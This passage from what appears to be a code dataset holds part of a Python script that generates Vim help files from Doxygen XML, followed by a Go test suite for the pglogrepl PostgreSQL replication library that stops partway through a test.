text += render_node(c, text, indent=indent, width=width)
elif n.nodeName == 'itemizedlist':
for c in n.childNodes:
text += '{}\n'.format(render_node(c, text, prefix='• ',
indent=indent, width=width))
elif n.nodeName == 'orderedlist':
i = 1
for c in n.childNodes:
if is_blank(get_text(c)):
text += '\n'
continue
text += '{}\n'.format(render_node(c, text, prefix='{}. '.format(i),
indent=indent, width=width))
i = i + 1
elif n.nodeName == 'simplesect' and 'note' == n.getAttribute('kind'):
text += '\nNote:\n '
for c in n.childNodes:
text += render_node(c, text, indent=' ', width=width)
text += '\n'
elif n.nodeName == 'simplesect' and 'warning' == n.getAttribute('kind'):
text += 'Warning:\n '
for c in n.childNodes:
text += render_node(c, text, indent=' ', width=width)
text += '\n'
elif (n.nodeName == 'simplesect'
and n.getAttribute('kind') in ('return', 'see')):
text += ind(' ')
for c in n.childNodes:
text += render_node(c, text, indent=' ', width=width)
elif n.nodeName == 'computeroutput':
return get_text(n)
else:
raise RuntimeError('unhandled node type: {}\n{}'.format(
n.nodeName, n.toprettyxml(indent=' ', newl='\n')))
return text
def para_as_map(parent, indent='', width=62, fmt_vimhelp=False):
"""Extracts a Doxygen XML <para> node to a map.
Keys:
'text': Text from this <para> element
'params': <parameterlist> map
'return': List of @return strings
'seealso': List of @see strings
'xrefs': ?
"""
chunks = {
'text': '',
'params': collections.OrderedDict(),
'return': [],
'seealso': [],
'xrefs': []
}
# Ordered dict of ordered lists.
groups = collections.OrderedDict([
('params', []),
('return', []),
('seealso', []),
('xrefs', []),
])
# Gather nodes into groups. Mostly this is because we want "parameterlist"
# nodes to appear together.
text = ''
kind = ''
last = ''
if is_inline(parent):
# Flatten inline text from a tree of non-block nodes.
text = doc_wrap(render_node(parent, "", fmt_vimhelp=fmt_vimhelp),
indent=indent, width=width)
else:
prev = None # Previous node
for child in parent.childNodes:
if child.nodeName == 'parameterlist':
groups['params'].append(child)
elif child.nodeName == 'xrefsect':
groups['xrefs'].append(child)
elif child.nodeName == 'simplesect':
last = kind
kind = child.getAttribute('kind')
if kind == 'return' or (kind == 'note' and last == 'return'):
groups['return'].append(child)
elif kind == 'see':
groups['seealso'].append(child)
elif kind in ('note', 'warning'):
text += render_node(child, text, indent=indent,
width=width, fmt_vimhelp=fmt_vimhelp)
else:
raise RuntimeError('unhandled simplesect: {}\n{}'.format(
child.nodeName, child.toprettyxml(indent=' ', newl='\n')))
else:
if (prev is not None
and is_inline(self_or_child(prev))
and is_inline(self_or_child(child))
and '' != get_text(self_or_child(child)).strip()
and text
and ' ' != text[-1]):
text += ' '
text += render_node(child, text, indent=indent, width=width,
fmt_vimhelp=fmt_vimhelp)
prev = child
chunks['text'] += text
# Generate map from the gathered items.
if len(groups['params']) > 0:
for child in groups['params']:
update_params_map(child, ret_map=chunks['params'], width=width)
for child in groups['return']:
chunks['return'].append(render_node(
child, '', indent=indent, width=width, fmt_vimhelp=fmt_vimhelp))
for child in groups['seealso']:
chunks['seealso'].append(render_node(
child, '', indent=indent, width=width, fmt_vimhelp=fmt_vimhelp))
xrefs = set()
for child in groups['xrefs']:
# XXX: Add a space (or any char) to `title` here, otherwise xrefs
# ("Deprecated" section) acts very weird...
title = get_text(get_child(child, 'xreftitle')) + ' '
xrefs.add(title)
xrefdesc = get_text(get_child(child, 'xrefdescription'))
chunks['xrefs'].append(doc_wrap(xrefdesc, prefix='{}: '.format(title),
width=width) + '\n')
return chunks, xrefs
def fmt_node_as_vimhelp(parent, width=62, indent='', fmt_vimhelp=False):
"""Renders (nested) Doxygen <para> nodes as Vim :help text.
NB: Blank lines in a docstring manifest as <para> tags.
"""
rendered_blocks = []
def fmt_param_doc(m):
"""Renders a params map as Vim :help text."""
max_name_len = max_name(m.keys()) + 4
out = ''
for name, desc in m.items():
name = ' {}'.format('{{{}}}'.format(name).ljust(max_name_len))
out += '{}{}\n'.format(name, desc)
return out.rstrip()
def has_nonexcluded_params(m):
"""Returns true if any of the given params has at least
one non-excluded item."""
if fmt_param_doc(m) != '':
return True
for child in parent.childNodes:
para, _ = para_as_map(child, indent, width, fmt_vimhelp)
# Generate text from the gathered items.
chunks = [para['text']]
if len(para['params']) > 0 and has_nonexcluded_params(para['params']):
chunks.append('\nParameters: ~')
chunks.append(fmt_param_doc(para['params']))
if len(para['return']) > 0:
chunks.append('\nReturn: ~')
for s in para['return']:
chunks.append(s)
if len(para['seealso']) > 0:
chunks.append('\nSee also: ~')
for s in para['seealso']:
chunks.append(s)
for s in para['xrefs']:
chunks.append(s)
rendered_blocks.append(clean_lines('\n'.join(chunks).strip()))
rendered_blocks.append('')
return clean_lines('\n'.join(rendered_blocks).strip())
def extract_from_xml(filename, target, width, fmt_vimhelp):
"""Extracts Doxygen info as maps without formatting the text.
Returns two maps:
1. Functions
2. Deprecated functions
The `fmt_vimhelp` variable controls some special cases for use by
fmt_doxygen_xml_as_vimhelp(). (TODO: ugly :)
"""
fns = {} # Map of func_name:docstring.
deprecated_fns = {} # Map of func_name:docstring.
dom = minidom.parse(filename)
compoundname = get_text(dom.getElementsByTagName('compoundname')[0])
for member in dom.getElementsByTagName('memberdef'):
if member.getAttribute('static') == 'yes' or \
member.getAttribute('kind') != 'function' or \
member.getAttribute('prot') == 'private' or \
get_text(get_child(member, 'name')).startswith('_'):
continue
loc = find_first(member, 'location')
if 'private' in loc.getAttribute('file'):
continue
return_type = get_text(get_child(member, 'type'))
if return_type == '':
continue
if return_type.startswith(('ArrayOf', 'DictionaryOf')):
parts = return_type.strip('_').split('_')
return_type = '{}({})'.format(parts[0], ', '.join(parts[1:]))
name = get_text(get_child(member, 'name'))
annotations = get_text(get_child(member, 'argsstring'))
if annotations and ')' in annotations:
annotations = annotations.rsplit(')', 1)[-1].strip()
# XXX: (doxygen 1.8.11) 'argsstring' only includes attributes of
# non-void functions. Special-case void functions here.
if name == 'nvim_get_mode' and len(annotations) == 0:
annotations += 'FUNC_API_FAST'
annotations = filter(None, map(lambda x: annotation_map.get(x),
annotations.split()))
params = []
type_length = 0
for param in iter_children(member, 'param'):
param_type = get_text(get_child(param, 'type')).strip()
param_name = ''
declname = get_child(param, 'declname')
if declname:
param_name = get_text(declname).strip()
elif CONFIG[target]['mode'] == 'lua':
# XXX: this is what lua2dox gives us...
param_name = param_type
param_type = ''
if param_name in param_exclude:
continue
if fmt_vimhelp and param_type.endswith('*'):
param_type = param_type.strip('* ')
param_name = '*' + param_name
type_length = max(type_length, len(param_type))
params.append((param_type, param_name))
# Handle Object Oriented style functions here.
# We make sure they have "self" in the parameters,
# and a parent function
if return_type.startswith('function') \
and len(return_type.split(' ')) >= 2 \
and any(x[1] == 'self' for x in params):
split_return = return_type.split(' ')
name = f'{split_return[1]}:{name}'
c_args = []
for param_type, param_name in params:
c_args.append((' ' if fmt_vimhelp else '') + (
'%s %s' % (param_type.ljust(type_length), param_name)).strip())
if not fmt_vimhelp:
pass
else:
fstem = '?'
if '.' in compoundname:
fstem = compoundname.split('.')[0]
fstem = CONFIG[target]['module_override'].get(fstem, fstem)
vimtag = CONFIG[target]['fn_helptag_fmt'](fstem, name)
prefix = '%s(' % name
suffix = '%s)' % ', '.join('{%s}' % a[1] for a in params
if a[0] not in ('void', 'Error'))
if not fmt_vimhelp:
c_decl = '%s %s(%s);' % (return_type, name, ', '.join(c_args))
signature = prefix + suffix
else:
c_decl = textwrap.indent('%s %s(\n%s\n);' % (return_type, name,
',\n'.join(c_args)),
' ')
# Minimum 8 chars between signature and vimtag
lhs = (width - 8) - len(vimtag)
if len(prefix) + len(suffix) > lhs:
signature = vimtag.rjust(width) + '\n'
signature += doc_wrap(suffix, width=width, prefix=prefix,
func=True)
else:
signature = prefix + suffix
signature += vimtag.rjust(width - len(signature))
# Tracks `xrefsect` titles. As of this writing, used only for separating
# deprecated functions.
xrefs_all = set()
paras = []
brief_desc = find_first(member, 'briefdescription')
if brief_desc:
for child in brief_desc.childNodes:
para, xrefs = para_as_map(child)
xrefs_all.update(xrefs)
desc = find_first(member, 'detaileddescription')
if desc:
for child in desc.childNodes:
para, xrefs = para_as_map(child)
paras.append(para)
xrefs_all.update(xrefs)
log.debug(
textwrap.indent(
re.sub(r'\n\s*\n+', '\n',
desc.toprettyxml(indent=' ', newl='\n')), ' ' * 16))
fn = {
'annotations': list(annotations),
'signature': signature,
'parameters': params,
'parameters_doc': collections.OrderedDict(),
'doc': [],
'return': [],
'seealso': [],
}
if fmt_vimhelp:
fn['desc_node'] = desc
fn['brief_desc_node'] = brief_desc
for m in paras:
if 'text' in m:
if not m['text'] == '':
fn['doc'].append(m['text'])
if 'params' in m:
# Merge OrderedDicts.
fn['parameters_doc'].update(m['params'])
if 'return' in m and len(m['return']) > 0:
fn['return'] += m['return']
if 'seealso' in m and len(m['seealso']) > 0:
fn['seealso'] += m['seealso']
if INCLUDE_C_DECL:
fn['c_decl'] = c_decl
if 'Deprecated' in str(xrefs_all):
deprecated_fns[name] = fn
elif name.startswith(CONFIG[target]['fn_name_prefix']):
fns[name] = fn
fns = collections.OrderedDict(sorted(
fns.items(),
key=lambda key_item_tuple: key_item_tuple[0].lower()))
deprecated_fns = collections.OrderedDict(sorted(deprecated_fns.items()))
return fns, deprecated_fns
def fmt_doxygen_xml_as_vimhelp(filename, target):
"""Entrypoint for generating Vim :help from from Doxygen XML.
Returns 3 items:
1. Vim help text for functions found in `filename`.
2. Vim help text for deprecated functions.
"""
fns_txt = {} # Map of func_name:vim-help-text.
deprecated_fns_txt = {} # Map of func_name:vim-help-text.
fns, _ = extract_from_xml(filename, target, text_width, True)
for name, fn in fns.items():
# Generate Vim :help for parameters.
if fn['desc_node']:
doc = fmt_node_as_vimhelp(fn['desc_node'], fmt_vimhelp=True)
if not doc and fn['brief_desc_node']:
doc = fmt_node_as_vimhelp(fn['brief_desc_node'])
if not doc:
doc = 'TODO: Documentation'
annotations = '\n'.join(fn['annotations'])
if annotations:
annotations = ('\n\nAttributes: ~\n' +
textwrap.indent(annotations, ' '))
i = doc.rfind('Parameters: ~')
if i == -1:
doc += annotations
else:
doc = doc[:i] + annotations + '\n\n' + doc[i:]
if INCLUDE_C_DECL:
doc += '\n\nC Declaration: ~\n>\n'
doc += fn['c_decl']
doc += '\n<'
func_doc = fn['signature'] + '\n'
func_doc += textwrap.indent(clean_lines(doc), ' ' * 16)
# Verbatim handling.
func_doc = re.sub(r'^\s+([<>])$', r'\1', func_doc, flags=re.M)
split_lines = func_doc.split('\n')
start = 0
while True:
try:
start = split_lines.index('>', start)
except ValueError:
break
try:
end = split_lines.index('<', start)
except ValueError:
break
split_lines[start + 1:end] = [
(' ' + x).rstrip()
for x in textwrap.dedent(
"\n".join(
split_lines[start+1:end]
)
).split("\n")
]
start = end
func_doc = "\n".join(split_lines)
if name.startswith(CONFIG[target]['fn_name_prefix']):
fns_txt[name] = func_doc
return ('\n\n'.join(list(fns_txt.values())),
'\n\n'.join(list(deprecated_fns_txt.values())))
def delete_lines_below(filename, tokenstr):
"""Deletes all lines below the line containing `tokenstr`, the line itself,
and one line above it.
"""
lines = open(filename).readlines()
i = 0
found = False
for i, line in enumerate(lines, 1):
if tokenstr in line:
found = True
break
if not found:
raise RuntimeError(f'not found: "{tokenstr}"')
i = max(0, i - 2)
with open(filename, 'wt') as fp:
fp.writelines(lines[0:i])
def main(config, args):
"""Generates:
1. Vim :help docs
2. *.mpack files for use by API clients
Doxygen is called and configured through stdin.
"""
for target in CONFIG:
if args.target is not None and target != args.target:
continue
mpack_file = os.path.join(
base_dir, 'runtime', 'doc',
CONFIG[target]['filename'].replace('.txt', '.mpack'))
if os.path.exists(mpack_file):
os.remove(mpack_file)
output_dir = out_dir.format(target=target)
log.info("Generating documentation for %s in folder %s",
target, output_dir)
debug = args.log_level >= logging.DEBUG
p = subprocess.Popen(
['doxygen', '-'],
stdin=subprocess.PIPE,
# silence warnings
# runtime/lua/vim/lsp.lua:209: warning: argument 'foo' not found
stderr=(subprocess.STDOUT if debug else subprocess.DEVNULL))
p.communicate(
config.format(
input=' '.join(
[f'"{file}"' for file in CONFIG[target]['files']]),
output=output_dir,
filter=filter_cmd,
file_patterns=CONFIG[target]['file_patterns'])
.encode('utf8')
)
if p.returncode:
sys.exit(p.returncode)
fn_map_full = {} # Collects all functions as each module is processed.
sections = {}
intros = {}
sep = '=' * text_width
base = os.path.join(output_dir, 'xml')
dom = minidom.parse(os.path.join(base, 'index.xml'))
# generate docs for section intros
for compound in dom.getElementsByTagName('compound'):
if compound.getAttribute('kind') != 'group':
continue
groupname = get_text(find_first(compound, 'name'))
groupxml = os.path.join(base, '%s.xml' %
compound.getAttribute('refid'))
group_parsed = minidom.parse(groupxml)
doc_list = []
brief_desc = find_first(group_parsed, 'briefdescription')
if brief_desc:
for child in brief_desc.childNodes:
doc_list.append(fmt_node_as_vimhelp(child))
desc = find_first(group_parsed, 'detaileddescription')
if desc:
doc = fmt_node_as_vimhelp(desc)
if doc:
doc_list.append(doc)
intros[groupname] = "\n".join(doc_list)
for compound in dom.getElementsByTagName('compound'):
if compound.getAttribute('kind') != 'file':
continue
filename = get_text(find_first(compound, 'name'))
if filename.endswith('.c') or filename.endswith('.lua'):
xmlfile = os.path.join(base,
'{}.xml'.format(compound.getAttribute('refid')))
# Extract unformatted (*.mpack).
fn_map, _ = extract_from_xml(xmlfile, target, 9999, False)
# Extract formatted (:help).
functions_text, deprecated_text = fmt_doxygen_xml_as_vimhelp(
os.path.join(base, '{}.xml'.format(
compound.getAttribute('refid'))), target)
if not functions_text and not deprecated_text:
continue
else:
name = os.path.splitext(
os.path.basename(filename))[0].lower()
sectname = name.upper() if name == 'ui' else name.title()
doc = ''
intro = intros.get(f'api-{name}')
if intro:
doc += '\n\n' + intro
if functions_text:
doc += '\n\n' + functions_text
if INCLUDE_DEPRECATED and deprecated_text:
doc += f'\n\n\nDeprecated {sectname} Functions: ~\n\n'
doc += deprecated_text
if doc:
filename = os.path.basename(filename)
sectname = CONFIG[target]['section_name'].get(
filename, sectname)
title = CONFIG[target]['section_fmt'](sectname)
helptag = CONFIG[target]['helptag_fmt'](sectname)
sections[filename] = (title, helptag, doc)
fn_map_full.update(fn_map)
if len(sections) == 0:
fail(f'no sections for target: {target}')
if len(sections) > len(CONFIG[target]['section_order']):
raise RuntimeError(
'found new modules "{}"; update the "section_order" map'.format(
set(sections).difference(CONFIG[target]['section_order'])))
first_section_tag = sections[CONFIG[target]['section_order'][0]][1]
docs = ''
i = 0
for filename in CONFIG[target]['section_order']:
try:
title, helptag, section_doc = sections.pop(filename)
except KeyError:
msg(f'warning: empty docs, skipping (target={target}): {filename}')
msg(f' existing docs: {sections.keys()}')
continue
i += 1
if filename not in CONFIG[target]['append_only']:
docs += sep
docs += '\n%s%s' % (title,
helptag.rjust(text_width - len(title)))
docs += section_doc
docs += '\n\n\n'
docs = docs.rstrip() + '\n\n'
docs += ' vim:tw=78:ts=8:ft=help:norl:\n'
doc_file = os.path.join(base_dir, 'runtime', 'doc',
CONFIG[target]['filename'])
if os.path.exists(doc_file):
delete_lines_below(doc_file, first_section_tag)
with open(doc_file, 'ab') as fp:
fp.write(docs.encode('utf8'))
fn_map_full = collections.OrderedDict(sorted(fn_map_full.items()))
with open(mpack_file, 'wb') as fp:
fp.write(msgpack.packb(fn_map_full, use_bin_type=True))
if not args.keep_tmpfiles:
shutil.rmtree(output_dir)
msg_report()
def filter_source(filename):
name, extension = os.path.splitext(filename)
if extension == '.lua':
p = subprocess.run([lua2dox_filter, filename], stdout=subprocess.PIPE)
op = ('?' if 0 != p.returncode else p.stdout.decode('utf-8'))
print(op)
else:
"""Filters the source to fix macros that confuse Doxygen."""
with open(filename, 'rt') as fp:
print(re.sub(r'^(ArrayOf|DictionaryOf)(\(.*?\))',
lambda m: m.group(1)+'_'.join(
re.split(r'[^\w]+', m.group(2))),
fp.read(), flags=re.M))
def parse_args():
targets = ', '.join(CONFIG.keys())
ap = argparse.ArgumentParser(
description="Generate helpdoc from source code")
ap.add_argument(
"--log-level", "-l", choices=LOG_LEVELS.keys(),
default=logging.getLevelName(logging.ERROR), help="Set log verbosity"
)
ap.add_argument('source_filter', nargs='*',
help="Filter source file(s)")
ap.add_argument('-k', '--keep-tmpfiles', action='store_true',
help="Keep temporary files")
ap.add_argument('-t', '--target',
help=f'One of ({targets}), defaults to "all"')
return ap.parse_args()
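# Doxygen configuration template, piped to `doxygen -` on stdin; the {input},
# {output}, {filter} and {file_patterns} placeholders are filled in by main().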
Doxyfile = textwrap.dedent('''
OUTPUT_DIRECTORY = {output}
INPUT = {input}
INPUT_ENCODING = UTF-8
FILE_PATTERNS = {file_patterns}
RECURSIVE = YES
INPUT_FILTER = "{filter}"
EXCLUDE =
EXCLUDE_SYMLINKS = NO
EXCLUDE_PATTERNS = */private/* */health.lua */_*.lua
EXCLUDE_SYMBOLS =
EXTENSION_MAPPING = lua=C
EXTRACT_PRIVATE = NO
GENERATE_HTML = NO
GENERATE_DOCSET = NO
GENERATE_HTMLHELP = NO
GENERATE_QHP = NO
GENERATE_TREEVIEW = NO
GENERATE_LATEX = NO
GENERATE_RTF = NO
GENERATE_MAN = NO
GENERATE_DOCBOOK = NO
GENERATE_AUTOGEN_DEF = NO
GENERATE_XML = YES
XML_OUTPUT = xml
XML_PROGRAMLISTING = NO
ENABLE_PREPROCESSING = YES
MACRO_EXPANSION = YES
EXPAND_ONLY_PREDEF = NO
MARKDOWN_SUPPORT = YES
''')
if __name__ == "__main__":
args = parse_args()
print("Setting log level to %s" % args.log_level)
args.log_level = LOG_LEVELS[args.log_level]
log.setLevel(args.log_level)
log.addHandler(logging.StreamHandler())
if len(args.source_filter) > 0:
filter_source(args.source_filter[0])
else:
main(Doxyfile, args)
# vim: set ft=python ts=4 sw=4 tw=79 et :
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
pglogrepl_test.go
|
package pglogrepl_test
import (
"context"
"fmt"
"os"
"strconv"
"testing"
"time"
"github.com/jackc/pgconn"
"github.com/jackc/pglogrepl"
"github.com/jackc/pgproto3/v2"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
"github.com/stretchr/testify/suite"
)
func TestLSNSuite(t *testing.T) {
suite.Run(t, new(lsnSuite))
}
type lsnSuite struct {
suite.Suite
}
func (s *lsnSuite) R() *require.Assertions {
return s.Require()
}
func (s *lsnSuite) Equal(e, a interface{}, args ...interface{}) {
s.R().Equal(e, a, args...)
}
func (s *lsnSuite) NoError(err error) {
s.R().NoError(err)
}
func (s *lsnSuite) TestScannerInterface() {
var lsn pglogrepl.LSN
lsnText := "16/B374D848"
lsnUint64 := uint64(97500059720)
var err error
err = lsn.Scan(lsnText)
s.NoError(err)
s.Equal(lsnText, lsn.String())
err = lsn.Scan([]byte(lsnText))
s.NoError(err)
s.Equal(lsnText, lsn.String())
lsn = 0
err = lsn.Scan(lsnUint64)
s.NoError(err)
s.Equal(lsnText, lsn.String())
err = lsn.Scan(int64(lsnUint64))
s.Error(err)
s.T().Log(err)
}
func (s *lsnSuite) TestScanToNil() {
var lsnPtr *pglogrepl.LSN
err := lsnPtr.Scan("16/B374D848")
s.NoError(err)
}
func (s *lsnSuite) TestValueInterface() {
lsn := pglogrepl.LSN(97500059720)
driverValue, err := lsn.Value()
s.NoError(err)
lsnStr, ok := driverValue.(string)
s.R().True(ok)
s.Equal("16/B374D848", lsnStr)
}
const slotName = "pglogrepl_test"
const outputPlugin = "test_decoding"
func closeConn(t testing.TB, conn *pgconn.PgConn) {
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
defer cancel()
require.NoError(t, conn.Close(ctx))
}
func TestIdentifySystem(t *testing.T) {
ctx, cancel := context.WithTimeout(context.Background(), time.Second*5)
defer cancel()
conn, err := pgconn.Connect(ctx, os.Getenv("PGLOGREPL_TEST_CONN_STRING"))
require.NoError(t, err)
defer closeConn(t, conn)
sysident, err := pglogrepl.IdentifySystem(ctx, conn)
require.NoError(t, err)
assert.Greater(t, len(sysident.SystemID), 0)
assert.True(t, sysident.Timeline > 0)
assert.True(t, sysident.XLogPos > 0)
assert.Greater(t, len(sysident.DBName), 0)
}
func TestGetHistoryFile(t *testing.T) {
ctx, cancel := context.WithTimeout(context.Background(), time.Second*5)
defer cancel()
config, err := pgconn.ParseConfig(os.Getenv("PGLOGREPL_TEST_CONN_STRING"))
require.NoError(t, err)
config.RuntimeParams["replication"] = "on"
conn, err := pgconn.ConnectConfig(ctx, config)
require.NoError(t, err)
defer closeConn(t, conn)
sysident, err := pglogrepl.IdentifySystem(ctx, conn)
require.NoError(t, err)
tlh, err := pglogrepl.TimelineHistory(ctx, conn, 0)
require.Error(t, err)
tlh, err = pglogrepl.TimelineHistory(ctx, conn, 1)
require.Error(t, err)
if sysident.Timeline > 1 {
// This test requires a Postgres with at least 1 timeline increase (promote, or recover)...
tlh, err = pglogrepl.TimelineHistory(ctx, conn, sysident.Timeline)
require.NoError(t, err)
expectedFileName := fmt.Sprintf("%08X.history", sysident.Timeline)
assert.Equal(t, expectedFileName, tlh.FileName)
assert.Greater(t, len(tlh.Content), 0)
}
}
func TestCreateReplicationSlot(t *testing.T) {
ctx, cancel := context.WithTimeout(context.Background(), time.Second*5)
defer cancel()
conn, err := pgconn.Connect(ctx, os.Getenv("PGLOGREPL_TEST_CONN_STRING"))
require.NoError(t, err)
defer closeConn(t, conn)
result, err := pglogrepl.CreateReplicationSlot(ctx, conn, slotName, outputPlugin, pglogrepl.CreateReplicationSlotOptions{Temporary: true})
require.NoError(t, err)
assert.Equal(t, slotName, result.SlotName)
assert.Equal(t, outputPlugin, result.OutputPlugin)
}
func TestDropReplicationSlot(t *testing.T) {
ctx, cancel := context.WithTimeout(context.Background(), time.Second*5)
defer cancel()
conn, err := pgconn.Connect(ctx, os.Getenv("PGLOGREPL_TEST_CONN_STRING"))
require.NoError(t, err)
defer closeConn(t, conn)
_, err = pglogrepl.CreateReplicationSlot(ctx, conn, slotName, outputPlugin, pglogrepl.CreateReplicationSlotOptions{Temporary: true})
require.NoError(t, err)
err = pglogrepl.DropReplicationSlot(ctx, conn, slotName, pglogrepl.DropReplicationSlotOptions{})
require.NoError(t, err)
_, err = pglogrepl.CreateReplicationSlot(ctx, conn, slotName, outputPlugin, pglogrepl.CreateReplicationSlotOptions{Temporary: true})
require.NoError(t, err)
}
func TestStartReplication(t *testing.T) {
ctx, cancel := context.WithTimeout(context.Background(), time.Second*5)
defer cancel()
conn, err := pgconn.Connect(ctx, os.Getenv("PGLOGREPL_TEST_CONN_STRING"))
require.NoError(t, err)
defer closeConn(t, conn)
sysident, err := pglogrepl.IdentifySystem(ctx, conn)
require.NoError(t, err)
_, err = pglogrepl.CreateReplicationSlot(ctx, conn, slotName, outputPlugin, pglogrepl.CreateReplicationSlotOptions{Temporary: true})
require.NoError(t, err)
err = pglogrepl.StartReplication(ctx, conn, slotName, sysident.XLogPos, pglogrepl.StartReplicationOptions{})
require.NoError(t, err)
go func() {
ctx, cancel := context.WithTimeout(context.Background(), time.Second*5)
defer cancel()
config, err := pgconn.ParseConfig(os.Getenv("PGLOGREPL_TEST_CONN_STRING"))
require.NoError(t, err)
delete(config.RuntimeParams, "replication")
conn, err := pgconn.ConnectConfig(ctx, config)
require.NoError(t, err)
defer closeConn(t, conn)
_, err = conn.Exec(ctx, `
create table t(id int primary key, name text);
insert into t values (1, 'foo');
insert into t values (2, 'bar');
insert into t values (3, 'baz');
update t set name='quz' where id=3;
delete from t where id=2;
drop table t;
`).ReadAll()
require.NoError(t, err)
}()
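// Helpers that read the next CopyData message from the replication stream and
// decode it as a primary keepalive or an XLogData message respectively.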
rxKeepAlive := func() pglogrepl.PrimaryKeepaliveMessage {
msg, err := conn.ReceiveMessage(ctx)
require.NoError(t, err)
cdMsg, ok := msg.(*pgproto3.CopyData)
require.True(t, ok)
require.Equal(t, byte(pglogrepl.PrimaryKeepaliveMessageByteID), cdMsg.Data[0])
pkm, err := pglogrepl.ParsePrimaryKeepaliveMessage(cdMsg.Data[1:])
require.NoError(t, err)
return pkm
}
rxXLogData := func() pglogrepl.XLogData {
msg, err := conn.ReceiveMessage(ctx)
require.NoError(t, err)
cdMsg, ok := msg.(*pgproto3.CopyData)
require.True(t, ok)
require.Equal(t, byte(pglogrepl.XLogDataByteID), cdMsg.Data[0])
xld, err := pglogrepl.ParseXLogData(cdMsg.Data[1:])
require.NoError(t, err)
return xld
}
rxKeepAlive()
xld := rxXLogData()
assert.Equal(t, "BEGIN", string(xld.WALData[:5]))
xld = rxXLogData()
assert.Equal(t, "table public.t: INSERT: id[integer]:1 name[text]:'foo'", string(xld.WALData))
xld = rxXLogData()
assert.Equal(t, "table public.t: INSERT: id[integer]:2 name[text]:'bar'", string(xld.WALData))
xld = rxXLogData()
assert.Equal(t, "table public.t: INSERT: id[integer]:3 name[text]:'baz'", string(xld.WALData))
xld = rxXLogData()
assert.Equal(t, "table public.t: UPDATE: id[integer]:3 name[text]:'quz'", string(xld.WALData))
xld = rxXLogData()
assert.Equal(t, "table public.t: DELETE: id[integer]:2", string(xld.WALData))
xld = rxXLogData()
assert.Equal(t, "COMMIT", string(xld.WALData[:6]))
}
func TestStartReplicationPhysical(t *testing.T) {
ctx, cancel := context.WithTimeout(context.Background(), time.Second*50)
defer cancel()
conn, err := pgconn.Connect(ctx, os.Getenv("PGLOGREPL_TEST_CONN_STRING"))
require.NoError(t, err)
defer closeConn(t, conn)
sysident, err := pglogrepl.IdentifySystem(ctx, conn)
require.NoError(t, err)
_, err = pglogrepl.CreateReplicationSlot(ctx, conn, slotName, "", pglogrepl.CreateReplicationSlotOptions{Temporary: true, Mode: pglogrepl.PhysicalReplication})
require.NoError(t, err)
err = pglogrepl.StartReplication(ctx, conn, slotName, sysident.XLogPos, pglogrepl.StartReplicationOptions{Mode: pglogrepl.PhysicalReplication})
require.NoError(t, err)
go func() {
ctx, cancel := context.WithTimeout(context.Background(), time.Second*5)
defer cancel()
config, err := pgconn.ParseConfig(os.Getenv("PGLOGREPL_TEST_CONN_STRING"))
require.NoError(t, err)
delete(config.RuntimeParams, "replication")
conn, err := pgconn.ConnectConfig(ctx, config)
require.NoError(t, err)
defer closeConn(t, conn)
_, err = conn.Exec(ctx, `
create table mytable(id int primary key, name text);
drop table mytable;
`).ReadAll()
require.NoError(t, err)
}()
_ = func() pglogrepl.PrimaryKeepaliveMessage {
msg, err := conn.ReceiveMessage(ctx)
require.NoError(t, err)
cdMsg, ok := msg.(*pgproto3.CopyData)
require.True(t, ok)
require.Equal(t, byte(pglogrepl.PrimaryKeepaliveMessageByteID), cdMsg.Data[0])
pkm, err := pglogrepl.ParsePrimaryKeepaliveMessage(cdMsg.Data[1:])
require.NoError(t, err)
return pkm
}
rxXLogData := func() pglogrepl.XLogData {
msg, err := conn.ReceiveMessage(ctx)
require.NoError(t, err)
cdMsg, ok := msg.(*pgproto3.CopyData)
require.True(t, ok)
require.Equal(t, byte(pglogrepl.XLogDataByteID), cdMsg.Data[0])
xld, err := pglogrepl.ParseXLogData(cdMsg.Data[1:])
require.NoError(t, err)
return xld
}
xld := rxXLogData()
assert.Contains(t, string(xld.WALData), "mytable")
copyDoneResult, err := pglogrepl.SendStandbyCopyDone(ctx, conn)
require.NoError(t, err)
assert.Nil(t, copyDoneResult)
}
func TestBaseBackup(t *testing.T) {
// The base backup test can take a long time, so it can be skipped by setting PGLOGREPL_SKIP_BASE_BACKUP.
envSkipTest := os.Getenv("PGLOGREPL_SKIP_BASE_BACKUP")
if envSkipTest != "" {
skipTest, err := strconv.ParseBool(envSkipTest)
if err != nil {
t.Error(err)
} else if skipTest {
return
}
}
conn, err := pgconn.Connect(context.Background(), os.Getenv("PGLOGREPL_TEST_CONN_STRING"))
require.NoError(t, err)
defer closeConn(t, conn)
options := pglogrepl.BaseBackupOptions{
NoVerifyChecksums: true,
Progress: true,
Label: "pglogrepltest",
Fast: true,
WAL: true,
NoWait: true,
MaxRate: 1024,
TablespaceMap: true,
}
startRes, err := pglogrepl.StartBaseBackup(context.Background(), conn, options)
	require.NoError(t, err)
	require.GreaterOrEqual(t, startRes.TimelineID, int32(1))
	// Write the tablespaces
	for i := 0; i < len(startRes.Tablespaces)+1; i++ {
f, err := os.Create(fmt.Sprintf("/tmp/pglogrepl_test_tbs_%d.tar", i))
require.NoError(t, err)
		err = pglogrepl.NextTableSpace(context.Background(), conn)
		require.NoError(t, err)
		var message pgproto3.BackendMessage
L:
for {
message, err = conn.ReceiveMessage(context.Background())
require.NoError(t, err)
switch msg := message.(type) {
case *pgproto3.CopyData:
_, err := f.Write(msg.Data)
require.NoError(t, err)
case *pgproto3.CopyDone:
break L
default:
t.Errorf("Received unexpected message: %#v\n", msg)
}
}
err = f.Close()
require.NoError(t, err)
}
stopRes, err := pglogrepl.FinishBaseBackup(context.Background(), conn)
require.NoError(t, err)
require.Equal(t, startRes.TimelineID, stopRes.TimelineID)
require.Equal(t, len(stopRes.Tablespaces), 0)
require.Less(t, uint64(startRes.LSN), uint64(stopRes.LSN))
_, err = pglogrepl.StartBaseBackup(context.Background(), conn, options)
require.NoError(t, err)
}
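// Sketch, not from the original source: TestBaseBackup honours the
// PGLOGREPL_SKIP_BASE_BACKUP variable parsed above with strconv.ParseBool,
// so a run that skips it might look like:
//
//	PGLOGREPL_SKIP_BASE_BACKUP=true go test ./...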
func TestSendStandbyStatusUpdate(t *testing.T) {
ctx, cancel := context.WithTimeout(context.Background(), time.Second*5)
defer cancel()
conn, err := pgconn.Connect(ctx, os.Getenv("PGLOGREPL_TEST_CONN_STRING"))
require.NoError(t, err)
defer closeConn(t, conn)
sysident, err := pglogrepl.IdentifySystem(ctx, conn)
require.NoError(t, err)
